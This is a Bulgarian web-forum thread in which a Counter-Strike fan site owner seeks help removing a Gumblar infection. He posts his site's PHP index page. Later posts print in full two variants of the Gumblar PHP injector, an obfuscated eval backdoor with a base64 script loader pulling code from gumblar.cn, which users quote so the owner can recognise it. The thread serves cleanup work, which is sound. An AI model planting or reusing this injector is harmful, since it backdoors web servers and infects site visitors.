Вирус в сайта.

terorr

Registered
Значи бях пуснал тема за моят сайт ( http://web-tourist.net/forum/viewtopic.php?t=67185 ) че има вирус от този сайт http://gumblar.cn/rss/?id= (не правя реклама) И ми казаха да махна скрипта но като гледам файловете ввъ FTP-то няма нищо с този джава скрипт код от този сайт.
 
Еми ифрейм няма сложил съм tyxo,web counter, инлулдвам си страници
Код:
<? include("list.php"); ?> или <? require("list.php"); ?>
, Имам интеграция на форума логин и последн орегистриран но досега не съм имал проблем. Ако съм ъпдйтвал нещо по страниците е било само новнина която е html. Но досега съм нямал проблем..
 
разгледай всеки един файл, независимо къде е.
обикновенно е най-долу в кода, след тага </html> , добавят гнусния iframe
 
Както ти казаха - трябва да си провериш всички файлове.
Виж в темплейт файловете, както и някои, които се добавят веднага след хедъра.

След като незнаем какво представляват файловете ти няма как да помогнем. :)
 
Да но няма не пише такъв код в индекса като го гледам през FTP даже като го изтегля от FTP пак няма. Как да го махна това ?
 
Код:
<?php
$queryString = strtolower($_SERVER['QUERY_STRING']);

if (strstr($queryString,"<") OR strstr($queryString,">") OR strstr($queryString,"(") OR strstr($queryString,")") OR
strstr($queryString,"..") OR
strstr($queryString,"%") OR
strstr($queryString,"*") OR
strstr($queryString,"+") OR
strstr($queryString,"!") OR
strstr($queryString,"@")) {
$loc = $_SERVER['PHP_SELF'];
$ip = $_SERVER['REMOTE_ADDR'];
$date = date ("d-m-Y @ h:i:s");
$lfh = "log.txt";
$log = fopen ( $lfh,"a+" );
fputs ($log, "Attack Date: $date | Attacker IP: $ip | QueryString: $loc?=$queryString\n");
fclose($log);
echo "Вашата атака беше записана!";
}
?>

<?php include("admin/function_poll.php"); ?>

<?php

define('IN_PHPBB', true);

$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './forum/';

$phpEx = substr(strrchr(__FILE__, '.'), 1);

include($phpbb_root_path . 'common.' . $phpEx);



// Start session management

$user->session_begin();

$auth->acl($user->data);

$user->setup();

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<META NAME="keywords" CONTENT="Tutorials, CS, Counter-Strike, Servers, Cool, Forums, Help, Lessons, Uroci, Files, more Counter Strike, 1.5, 1.6, Програми, Изтегли CS, Пачове, CSS, Команди, Ботове, Сървъри, Карти, Демота, Модове, Плугини, cs, Скинове, AMX Mod X, Programs, Source, Download CS, Patchs, Commands, Bots, Condution Zero, Servers, Maps, Demos, Mods, Plugins, Skins, CFGs, Half Life,  content="Counter strike-ботове,модове,пачове,cs,,free downlaod cs 1.6,free downlaod counter strike,cs skinove,cs mapove,cs modove,cs pachove,cs pa4ove,counter strike 1.6 ,cs 1.6,sms admins cs,cs sarvers,cs bulgaria,cs bg,counter strike news,gungame sarvari, mernik za CS awp,massive.classic surf,,cstrike,Counter-Strike 1.6 Fan Site,Sms админ">
<meta name="description" content="Counter strike-ботове,модове,пачове,cs,,free downlaod cs 1.6,free downlaod counter strike,cs skinove,cs mapove,cs modove,cs pachove,cs pa4ove,counter strike 1.6 ,cs 1.6,sms admins cs,cs sarvers,cs bulgaria,cs bg,counter strike news,gungame sarvari, mernik za CS awp,massive.classic surf,,cstrike,Counter-Strike 1.6 Fan Site,Sms админ" />  
<title>CsSurfers</title>
<link rel="stylesheet" type="text/css" href="style.css" />
<link rel="shorcut icon" href="http://cssurfers.hit.bg/favicon.ico" />
</head>

<body>
<div id="container">
<center> <a href="http://cssurfers.net76.net" target="_blank"><img src="/images/header.gif" alt="Начало" width="760" border="0" height="150"></a></center>


	<div id="nav-container">
		<a href="index.php">Начало</a> |
		<a href="/forum/">Форум</a> |
                <a href="servers.php">Сървъри</a> |
                <a href="banners.php">Банери</a> |
		<a href="smsadmin.php">SMS Admin</a> |
		<a href="adv.php">Реклама</a> |
		<a href="contact.php">Контакти</a>
	</div>
	<div id="left">
		<h1>Вход</h1>
		<ul>
<?php

if ($user->data['user_id'] == ANONYMOUS)

{

echo"

<form action=\"". append_sid("{$phpbb_root_path}ucp.$phpEx", 'mode=login', true, $user->session_id) . "\" method=\"post\">

<input type=\"hidden\" name=\"mode\" value=\"login\" /><br />

<font color=white>Име:</font><br><input type=\"text\" name=\"username\" /><br />

<font color=white>Парола:</font><br><input type=\"password\" name=\"password\" /> <br />

<font color=white>Запомни</font> <input type=\"checkbox\" class=\"radio\" name=\"viewonline\" />

<input type=\"hidden\" name=\"autologin\" value=\"1\" /> <br />

<input type=\"submit\" value=\"Влез\" name=\"login\" />

<input type=\"hidden\" name=\"redirect\" value=\"index.$phpEx\" />

</form>

<br />

<a href=\"forum/ucp.$phpEx?mode=register\">Регистрация</a>

";

}

else

{

echo"

<form action=\"". append_sid("{$phpbb_root_path}ucp.$phpEx", 'mode=logout', true, $user->session_id) . "\" method=\"post\">

<input type=\"hidden\" name=\"mode\" value=\"logout\" />



Потребител: <a href='{$phpbb_root_path}memberlist.php?mode=viewprofile&u=".$user->data['user_id']."'>".$user->data['username']."</a>

<br>

Мнения: ".$user->data['user_posts']."</a>

<br>

Изход: <input type=\"submit\" value=\"Изход\" name=\"logout\" />

</form>

";

}

?>
<br />
За Форума
<?
    mysql_connect("sssss", "sss", "sssss") or die("can't connect");
    mysql_select_db("sssss") or die("can't select database");
    $our = mysql_query("SELECT count(post_text) as post_total FROM phpbb_posts");

    while($r=mysql_fetch_array($our)){
    echo "<div style='padding-left:3px;'>Имаме <b>".$r['post_total']."</b> написани мнения ";
    }

    $our = mysql_query("SELECT user_id, username FROM phpbb_users ORDER BY user_id DESC LIMIT 1");
    while($r=mysql_fetch_array($our)){
    echo "<br />Най-нов член: <b><a href=\"http://cssss/forum/memberlist.php?mode=viewprofile&u=".$r['user_id']."\">".$r['username']."</a></b></div>";
    }
    ?>

	        <h1>Counter-Strike 1.6</h1>
	        <ul>
		<li><a href="downloadcs.php">Свали играта</a></li>
                <li><a href="mods.php">Модове</a></li>
		<li><a href="plugins.php">Плъгини</a></li>
		<li><a href="maps.php">Карти</a></li>
		<li><a href="programs.php">Програми</a></li>
	</ul>	
                <h1>Приятели</h1>
		<ul>
                <center><?php require("ssss"); ?></center>
        </ul>
                <h1>Случайно клипче</h1>
		<ul>
                <center><?php require("csss"); ?></center>
                <br />
Ако искате да добавим ваше клипче или друго кликнете <a href="http://cssurfers.net76.net/forum/viewtopic.php?f=6&t=28">Тук</a>
        </ul>		
        </div>
	<div id="middle">
                <center><h1>CS Сайтове</h1></center>
		<p>
		<?php require("csbaners.php"); ?><br />
                <a href="http://wthost.net">web directory</a>
		</p>
                <center><h1>Нов начин да станете админ</h1></center>
                <p>
                Нов начин да станете админ <a href="http://points.cssurfers.net76.net/">Кликни за да видиш</a>
		</p>
                <center><h1>Radio CsSurfers</h1></center>
                <p>
		Днес се сдобихме и с радио за да го чуете <a href="http://cssurfers.net76.net/forum/viewtopic.php?f=46&t=142">Кликнете тук</a> by NightborN and FreedoM
		</p>
                <center><h1>Весели празници</h1></center>
		<p><img src="/images/nwz.png" alt="" />
		Всички от екипа на CsSurfers Ви пожелават весели празници <?php require("velikden.html"); ?>
		</p>
                <center><h1>Нов Сървър #Classic</h1></center>
		<p>
		Днес пуснахме нов сървър CsSurfers #Classic<br>IP:93.183.159.253:27015 
		</p>
                <center><h1>Случайно клипче</h1></center>
		<p>
		Както видяхте от ляво под менюто приятели сложих код за случайно клипче. Забавлявайте се.
		</p>
		<center><h1>За сайта</h1></center>
		<p>
		Нашият сайт стартира с нов дизайн. Скоро очаквайте подобрения.
		</p>
		<p>
		Днес стартира отново нашият сайт с нов дизайн. Очаквайте файлове, плъгини и други работи
		</p>
		<center><h1>Сървърите на сайта</h1></center>
		<p>
	        Сървъри: <a href="http://cssurfers.net76.net/servers.php">Виж сървърите</a> <br>
		</p>
		<center><h1>Гласувайте за сайта </h1></center>
		<p>
	   Гласувай за сайта в BgTop - <a href="http://bgtop.net/in.php/1238146536" target="_blank"><img src="http://bgtop.net/images/logos/bg_top_logo5.gif" alt="Елате в .: BGtop.net :. Топ класацията на българските сайтове и гласувайте за този сайт!!!" border="0" /></a>
		</p>
                <center><h1>Реклама</h1></center>
		<p>
<? include("view468x60.php"); ?>
		</p>
	</div>
	<div id="right">
		<h1>Сървъри</h1>
		<ul>
		<? require("server.php"); ?>	
                
		</ul>
                
                <h1>Анкета</h1>
		<ul>
                <?php @poll(); ?>
		</ul>


                <h1>Помогнете</h1>
		<ul>
		<center><a href="http://bgtop.net/in.php/1238146536" target="_blank"><img src="http://bgtop.net/images/logos/bg_top_logo5.gif" alt="Елате в .: BGtop.net :. Топ класацията на българските сайтове и гласувайте за този сайт!!!" border="0" /></a></center>
                                <br />
                <center><a href="http://top4e.info/index.php?p=in&site=12390249012601" target="_blank"><img src="http://top4e.info/images/vote/8.gif" alt="Top4e.Info - Класацията на българските сайтове." border="0" /></a></center>
		</ul>
		<h1>Сайт Статистика</small></h1>
		<ul>
		<center><script  type="text/javascript">

d=document;
d.write('<a href="http://www.tyxo.bg/?72833" title="Tyxo.bg counter" target=" blank"><img width="88" height="31" border="0" alt="Tyxo.bg counter"');
d.write(' src="http://cnt.tyxo.bg/72833?rnd='+Math.round(Math.random()*2147483647));
d.write('&sp='+screen.width+'x'+screen.height+'&r='+escape(d.referrer)+'" /><\/a>');
//-->
</script>
<noscript><a href="http://www.tyxo.bg/?72833" title="Tyxo.bg counter" target=" blank"><img src="http://cnt.tyxo.bg/72833" width="88" height="31" border="0" alt="Tyxo.bg counter" /></a></noscript>
</center>
<br />
<center>
<font size=1><script type="text/javascript" language="javascript"></script>
<script type="text/javascript" language="javascript1.2"></script>
<a href="http://counter.search.bg/cgi-bin/s?_id=surfers"
target="_top"><script type="text/javascript" language="javascript"></script><noscript><img width=70 height=15 border=0 alt=""
src="http://counter.search.bg/cgi-bin/c?_id=surfers&_z=0"></noscript></a></font>

<br />
<center><a href="http://wthost.net/seo_web_site_check.php?sait=referer" 
target="_blank"><img src="http://wthost.net/prcheck.php" 
width="80" height="15" border="0" alt="seo google"></a></center>
		</ul>
	</div>
	<div id="footer">
CsSurfers  <a href="ssss">Форум</a>  <img src="/images/bg.gif" alt="" /> 

	</div>


</div>
<? include("csss"); ?> <br />

<?
include("conf.php");
$sql = mysql_query("SELECT ctime FROM $dbtable WHERE ip=\"$ip\"");
if($row = mysql_fetch_array($sql)) {
$calc = $row['ctime'] + $vtime;
if ($calc < $time) { show(); }
}
else { show(); }
?> 


</body>
</html>
 
тогава е някъде по фаиловете на форума, експлоитнат ти е
имаго този код и в форума
 
Значи може да не е в index.php

ако темплейта ти е разделен на header center foter и се ползва include виж в header.php
 
доста сайтове са ударени от това...
http://www.110mb.com/forum/file-keep-getting-attacked-t45718.0.html

търси
Код:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdndXBtOW1ibFJnU2F5Y3IlMkVjbiUyRnJsWnN5Y3N3diUyRj9pZCUzRCcpLnJlcGxhY2UoL3BtOXxWRXxsWnx3dnxFNnx5Y3xSZ1MvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
по файловете..
 
Намерих тоя код най горе в индекса на форума

Код:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgnPDc2YXI8MjA8NjE8M2Q8MjJTY3JpcHRFbmdpbmU8MjI8MmNiPDNkPDIyVmVyPDczaW9uKCkrPDIyPDJjajwzZDwyMjwyMjwyY3U8M2RuYTw3NmlnYTw3NG88NzI8MmV1PDczPDY1ckFnPDY1bnQ8M2JpZjwyOCh1PDJlPDY5PDZlPDY0ZXhPPDY2PDI4PDIyPDU3aTw2ZTwyMik8M2UwKTwyNjwyNjwyOHU8MmVpPDZlZDw2NXg8NGY8NjYoPDIyPDRlPDU0PDIwPDM2PDIyKTwzYzA8Mjk8MjY8MjY8Mjhkb2M8NzVtZW50PDJlY288NmZraTw2NTwyZWluZDw2NXhPPDY2KDwyMjw2ZGllazwzZDE8MjI8Mjk8M2MwKTwyNjwyNig8NzR5cGVvZih6cnY8N2E8NzRzPDI5PDIxPDNkdHk8NzBlbzw2Nig8MjI8NDE8MjIpKSk8N2J6cnZ6dHM8M2Q8MjI8NDE8MjI8M2JldmFsPDI4PDIyPDY5Zih3aW5kbzw3NzwyZTwyMithPDJiPDIyPDI5ajwzZGorPDIyKzw2MTwyYjwyMk1ham9yPDIyK2IrPDYxKzwyMk1pbm9yPDIyKzw2MjwyYmErPDIyQnVpbDw2NDwyMitiKzwyMmo8M2I8MjIpPDNiZG88NjN1bWU8NmV0PDJldzw3Mml0PDY1KDwyMjwzY3NjcmlwPDc0PDIwc3JjPDNkPDJmPDJmZzw3NTw2ZDw2MmxhPDcyPDJlY248MmZyc3M8MmY8M2ZpPDY0PDNkPDIyKzw2YSs8MjI8M2U8M2M8NWM8MmY8NzNjPDcyaXB0PDNlPDIyKTwzYjw3ZCcpLnJlcGxhY2UodCwnJScpKSl9KSgvPC9nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
 
Във cron.php има едно

Код:
echo base64_decode('terorr///terorr==');

Обаче не е най горе в страницата
 

Горе